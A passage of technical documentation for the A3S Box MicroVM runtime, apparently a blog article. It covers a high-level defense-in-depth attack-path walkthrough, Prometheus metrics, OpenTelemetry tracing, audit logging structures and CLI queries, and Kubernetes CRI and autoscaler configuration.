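        cap_drop: list(get("A3S_SEC_CAP_DROP")),
    }
}
```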

&lt;h3&gt;
  
  
  16.10 Attack Path Analysis
&lt;/h3&gt;

&lt;p&gt;Let's analyze a hypothetical attack scenario to see how the seven layers work together:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Attacker goal: Read MicroVM B's memory data from MicroVM A

Step 1: Attacker gains application-level code execution in MicroVM A
        -&amp;gt; Faces Layer 7 (no-new-privileges): cannot escalate privileges
        -&amp;gt; Faces Layer 6 (Seccomp): dangerous syscalls blocked
        -&amp;gt; Faces Layer 5 (Capabilities): lacks necessary capabilities

Step 2: Assume attacker bypasses application-layer defenses, gains root
        -&amp;gt; Faces Layer 4 (Namespace): can only see own processes and filesystem
        -&amp;gt; Faces Layer 3 (Independent kernel): kernel vulnerabilities only affect own VM

Step 3: Assume attacker exploits a kernel vulnerability
        -&amp;gt; Faces Layer 1 (Hardware virtualization): VM Exit mechanism blocks cross-VM access
        -&amp;gt; Cannot read MicroVM B's memory

Step 4: Assume attacker even breaks through the virtualization layer (extremely rare)
        -&amp;gt; Faces Layer 2 (TEE memory encryption): MicroVM B's memory is encrypted
        -&amp;gt; Even if raw memory data is read, it's only ciphertext

Conclusion: The attacker must simultaneously breach all seven layers to achieve the goal.
            Each layer is independent; breaching one layer does not reduce other layers' defense strength.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  17. Observability: Prometheus, OpenTelemetry, and Auditing
&lt;/h2&gt;

&lt;h3&gt;
  
  
  17.1 The Three Pillars of Observability
&lt;/h3&gt;

&lt;p&gt;Running a MicroVM cluster in production requires visibility into what the system is doing. A3S Box implements the three pillars of observability: Metrics, Tracing, and Auditing.&lt;/p&gt;

&lt;h3&gt;
  
  
  17.2 Prometheus Metrics
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;RuntimeMetrics&lt;/code&gt; implements the &lt;code&gt;MetricsCollector&lt;/code&gt; trait, exposing the following metrics via the Prometheus client library:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;VM lifecycle metrics:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric Name&lt;/th&gt;
&lt;th&gt;Type&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;vm_boot_duration&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Histogram&lt;/td&gt;
&lt;td&gt;VM startup duration distribution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;vm_created_total&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Counter&lt;/td&gt;
&lt;td&gt;Total VMs created&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;vm_destroyed_total&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Counter&lt;/td&gt;
&lt;td&gt;Total VMs destroyed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;vm_count&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Gauge&lt;/td&gt;
&lt;td&gt;Current number of running VMs&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Command execution metrics:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric Name&lt;/th&gt;
&lt;th&gt;Type&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;exec_total&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Counter&lt;/td&gt;
&lt;td&gt;Total commands executed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;exec_duration&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Histogram&lt;/td&gt;
&lt;td&gt;Command execution duration distribution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;exec_errors_total&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Counter&lt;/td&gt;
&lt;td&gt;Total execution errors&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;VM-level metrics:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Each VM also exposes real-time resource usage metrics:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;VmMetrics&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;cpu_percent&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;f32&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;    &lt;span class="c1"&gt;// CPU usage&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;memory_bytes&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;   &lt;span class="c1"&gt;// Memory usage&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;These metrics are collected from the host's &lt;code&gt;/proc&lt;/code&gt; filesystem via the &lt;code&gt;sysinfo&lt;/code&gt; library, reflecting the actual resource consumption of the shim subprocess (i.e., the VM).&lt;/p&gt;

&lt;h3&gt;
  
  
  17.3 OpenTelemetry Distributed Tracing
&lt;/h3&gt;

&lt;p&gt;A3S Box integrates the OpenTelemetry SDK to generate distributed tracing spans for key operations. This allows operators to trace the complete path of a request from CLI to runtime to shim to Guest Init.&lt;/p&gt;

&lt;p&gt;Typical trace chain:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[a3s-box run nginx]
  +-- [runtime.create_vm]
       +-- [oci.pull_image]
       |    +-- [registry.authenticate]
       |    +-- [registry.pull_manifest]
       |    +-- [registry.pull_layers]
       +-- [rootfs.build]
       +-- [vm.start]
       |    +-- [shim.spawn]
       |    +-- [shim.wait_ready]
       +-- [vm.configure_network]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Trace data can be exported to SigNoz, Jaeger, or any backend compatible with the OTLP protocol.&lt;/p&gt;

&lt;h3&gt;
  
  
  17.4 Audit Log System
&lt;/h3&gt;

&lt;p&gt;Audit logs are a critical component of security compliance. A3S Box's audit system is based on the W7 model (Who, What, When, Where, Why, How, Outcome), recording all security-related operations.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;AuditEvent&lt;/code&gt; structure:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;AuditEvent&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                          &lt;span class="c1"&gt;// Unique event ID&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;timestamp&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;DateTime&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;Utc&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;            &lt;span class="c1"&gt;// Timestamp&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;action&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;AuditAction&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                 &lt;span class="c1"&gt;// Operation type&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;box_id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;              &lt;span class="c1"&gt;// Associated MicroVM ID&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;actor&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;               &lt;span class="c1"&gt;// Actor&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;outcome&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;AuditOutcome&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;               &lt;span class="c1"&gt;// Result&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;message&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;             &lt;span class="c1"&gt;// Description&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;metadata&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;HashMap&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;   &lt;span class="c1"&gt;// Additional metadata&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  17.5 Audit Operation Categories
&lt;/h3&gt;

&lt;p&gt;A3S Box defines 26 audit operations across eight categories:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Category&lt;/th&gt;
&lt;th&gt;Operations&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Box lifecycle&lt;/td&gt;
&lt;td&gt;Create, Start, Stop, Destroy, Restart&lt;/td&gt;
&lt;td&gt;VM creation, start, stop, destroy, restart&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Execution&lt;/td&gt;
&lt;td&gt;Command, Attach&lt;/td&gt;
&lt;td&gt;Command execution, terminal attach&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Image&lt;/td&gt;
&lt;td&gt;Pull, Push, Build, Delete&lt;/td&gt;
&lt;td&gt;Image pull, push, build, delete&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Network&lt;/td&gt;
&lt;td&gt;Create, Delete, Connect, Disconnect&lt;/td&gt;
&lt;td&gt;Network create, delete, connect, disconnect&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Volume&lt;/td&gt;
&lt;td&gt;Create, Delete&lt;/td&gt;
&lt;td&gt;Volume create, delete&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Security&lt;/td&gt;
&lt;td&gt;SignatureVerify, AttestationVerify, SecretInject, SealData, UnsealData&lt;/td&gt;
&lt;td&gt;Signature verify, attestation verify, key inject, data seal/unseal&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Auth&lt;/td&gt;
&lt;td&gt;RegistryLogin, Logout&lt;/td&gt;
&lt;td&gt;Registry login, logout&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;System&lt;/td&gt;
&lt;td&gt;Prune, ConfigChange&lt;/td&gt;
&lt;td&gt;Cleanup, config change&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Each audit event records an outcome (&lt;code&gt;AuditOutcome&lt;/code&gt;) that takes one of three values: &lt;code&gt;Success&lt;/code&gt;, &lt;code&gt;Failure&lt;/code&gt;, or &lt;code&gt;Denied&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  17.6 Audit Log Configuration
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;AuditConfig&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;enabled&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;       &lt;span class="c1"&gt;// Default true&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;max_size&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;       &lt;span class="c1"&gt;// Maximum single file size, default 50 MB&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;max_files&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;      &lt;span class="c1"&gt;// Maximum number of files, default 10&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Audit logs are written in JSON-lines format with log rotation support. When the active file reaches &lt;code&gt;max_size&lt;/code&gt;, it is rotated automatically, and at most &lt;code&gt;max_files&lt;/code&gt; historical files are retained. Total audit storage is therefore bounded by &lt;code&gt;max_size × max_files&lt;/code&gt; (500 MB by default).&lt;/p&gt;
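&lt;p&gt;The rotation policy itself is a small amount of bookkeeping. An in-memory sketch of the size-and-count bound (the real implementation writes to disk and renames files; &lt;code&gt;RotatingLog&lt;/code&gt; and its fields are illustrative):&lt;/p&gt;

```rust
// In-memory model of size-based rotation with a bounded history: rotate when
// the active file would exceed `max_size`, keep at most `max_files` files.
struct RotatingLog {
    max_size: usize,
    max_files: usize,
    files: Vec<Vec<u8>>, // files.last() is the active file
}

impl RotatingLog {
    fn new(max_size: usize, max_files: usize) -> Self {
        Self { max_size, max_files, files: vec![Vec::new()] }
    }

    fn write_line(&mut self, line: &[u8]) {
        if self.files.last().unwrap().len() + line.len() > self.max_size {
            self.files.push(Vec::new());           // rotate to a fresh file
            if self.files.len() > self.max_files { // evict the oldest file
                self.files.remove(0);
            }
        }
        self.files.last_mut().unwrap().extend_from_slice(line);
    }
}
```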

&lt;p&gt;Users can query audit logs via CLI:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# View all audit events&lt;/span&gt;
a3s-box audit

&lt;span class="c"&gt;# Filter by operation type&lt;/span&gt;
a3s-box audit &lt;span class="nt"&gt;--filter&lt;/span&gt; &lt;span class="s2"&gt;"action=exec"&lt;/span&gt;

&lt;span class="c"&gt;# Filter by MicroVM&lt;/span&gt;
a3s-box audit &lt;span class="nt"&gt;--filter&lt;/span&gt; &lt;span class="s2"&gt;"box_id=my-app"&lt;/span&gt;

&lt;span class="c"&gt;# Filter by time range&lt;/span&gt;
a3s-box audit &lt;span class="nt"&gt;--since&lt;/span&gt; &lt;span class="s2"&gt;"2024-01-01T00:00:00Z"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  17.7 Custom Audit Backend
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;AuditSink&lt;/code&gt; trait allows users to implement custom audit event persistence backends:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;trait&lt;/span&gt; &lt;span class="n"&gt;AuditSink&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Send&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;Sync&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;AuditEvent&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;flush&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The default implementation writes events to JSON-lines files. Users can implement their own &lt;code&gt;AuditSink&lt;/code&gt; to send events to Elasticsearch, Splunk, CloudWatch Logs, or any other log aggregation system.&lt;/p&gt;
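&lt;p&gt;As an illustration of a custom backend, here is an in-memory sink. The event struct and &lt;code&gt;Result&lt;/code&gt; type are simplified stand-ins for the real &lt;code&gt;AuditEvent&lt;/code&gt; and the crate's error alias; a production sink would forward to an external log system instead of buffering:&lt;/p&gt;

```rust
use std::sync::Mutex;

// Simplified event and trait mirroring the `AuditSink` shape above.
struct AuditEvent { action: String, outcome: String }

trait AuditSink: Send + Sync {
    fn write(&self, event: &AuditEvent) -> Result<(), String>;
    fn flush(&self) -> Result<(), String>;
}

// A custom backend that buffers events in memory; a real one would ship them
// to Elasticsearch, Splunk, CloudWatch Logs, etc.
struct MemorySink { buf: Mutex<Vec<String>> }

impl AuditSink for MemorySink {
    fn write(&self, event: &AuditEvent) -> Result<(), String> {
        self.buf.lock().map_err(|e| e.to_string())?
            .push(format!("{}:{}", event.action, event.outcome));
        Ok(())
    }
    fn flush(&self) -> Result<(), String> { Ok(()) } // nothing buffered on disk
}
```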




&lt;h2&gt;
  
  
  18. Kubernetes Integration: CRI Runtime
&lt;/h2&gt;

&lt;h3&gt;
  
  
  18.1 The Role of CRI
&lt;/h3&gt;

&lt;p&gt;CRI (Container Runtime Interface) is the standard interface defined by Kubernetes for communication between kubelet and container runtimes. By implementing CRI, A3S Box can run as a Kubernetes RuntimeClass — meaning Pods in a Kubernetes cluster can choose to run in A3S Box's MicroVMs rather than traditional runc containers.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubelet
  |
  +-- RuntimeClass: runc (default)
  |   +-- Traditional containers (shared kernel)
  |
  +-- RuntimeClass: a3s-box
      +-- MicroVM (independent kernel + optional TEE)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
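&lt;p&gt;Operationally, this choice is exposed through a standard &lt;code&gt;RuntimeClass&lt;/code&gt; object that Pods opt into via &lt;code&gt;runtimeClassName&lt;/code&gt;. A minimal sketch; the handler name &lt;code&gt;a3s-box&lt;/code&gt; is an assumption and must match whatever name the CRI runtime is registered under on the node:&lt;/p&gt;

```yaml
# Register A3S Box as a selectable runtime (node.k8s.io/v1 is the stable API).
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: a3s-box
handler: a3s-box   # assumed handler name; must match the CRI configuration
---
# A Pod opting into MicroVM isolation:
apiVersion: v1
kind: Pod
metadata:
  name: isolated-app
spec:
  runtimeClassName: a3s-box
  containers:
    - name: app
      image: nginx
```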



&lt;h3&gt;
  
  
  18.2 BoxAutoscaler CRD
&lt;/h3&gt;

&lt;p&gt;A3S Box defines a custom resource &lt;code&gt;BoxAutoscaler&lt;/code&gt; (API Group: &lt;code&gt;box.a3s.dev&lt;/code&gt;, version: &lt;code&gt;v1alpha1&lt;/code&gt;) for implementing MicroVM auto-scaling in Kubernetes:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;box.a3s.dev/v1alpha1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;BoxAutoscaler&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-service-autoscaler&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;targetRef&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;box.a3s.dev/v1alpha1&lt;/span&gt;
    &lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;BoxDeployment&lt;/span&gt;
    &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-service&lt;/span&gt;
  &lt;span class="na"&gt;minReplicas&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1&lt;/span&gt;
  &lt;span class="na"&gt;maxReplicas&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;10&lt;/span&gt;
  &lt;span class="na"&gt;metrics&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Cpu&lt;/span&gt;
      &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;70&lt;/span&gt;          &lt;span class="c1"&gt;# CPU usage target 70%&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Memory&lt;/span&gt;
      &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;          &lt;span class="c1"&gt;# Memory usage target 80%&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Rps&lt;/span&gt;
      &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1000&lt;/span&gt;        &lt;span class="c1"&gt;# Requests per second target&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Inflight&lt;/span&gt;
      &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;50&lt;/span&gt;          &lt;span class="c1"&gt;# Concurrent requests target&lt;/span&gt;
  &lt;span class="na"&gt;behavior&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;scaleUp&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;stabilizationWindowSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;60&lt;/span&gt;
      &lt;span class="na"&gt;policies&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pods&lt;/span&gt;
          &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3&lt;/span&gt;
          &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;60&lt;/span&gt;    &lt;span class="c1"&gt;# Scale up at most 3 per minute&lt;/span&gt;
    &lt;span class="na"&gt;scaleDown&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;stabilizationWindowSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;300&lt;/span&gt;
      &lt;span class="na"&gt;policies&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pods&lt;/span&gt;
          &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1&lt;/span&gt;
          &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;60&lt;/span&gt;    &lt;span class="c1"&gt;# Scale down at most 1 per minute&lt;/span&gt;
  &lt;span class="na"&gt;cooldownSecs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;60&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  18.3 Metric Types
&lt;/h3&gt;

&lt;p&gt;BoxAutoscaler supports five metric types:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric Type&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Typical Target&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Cpu&lt;/code&gt;&lt;/td&gt;
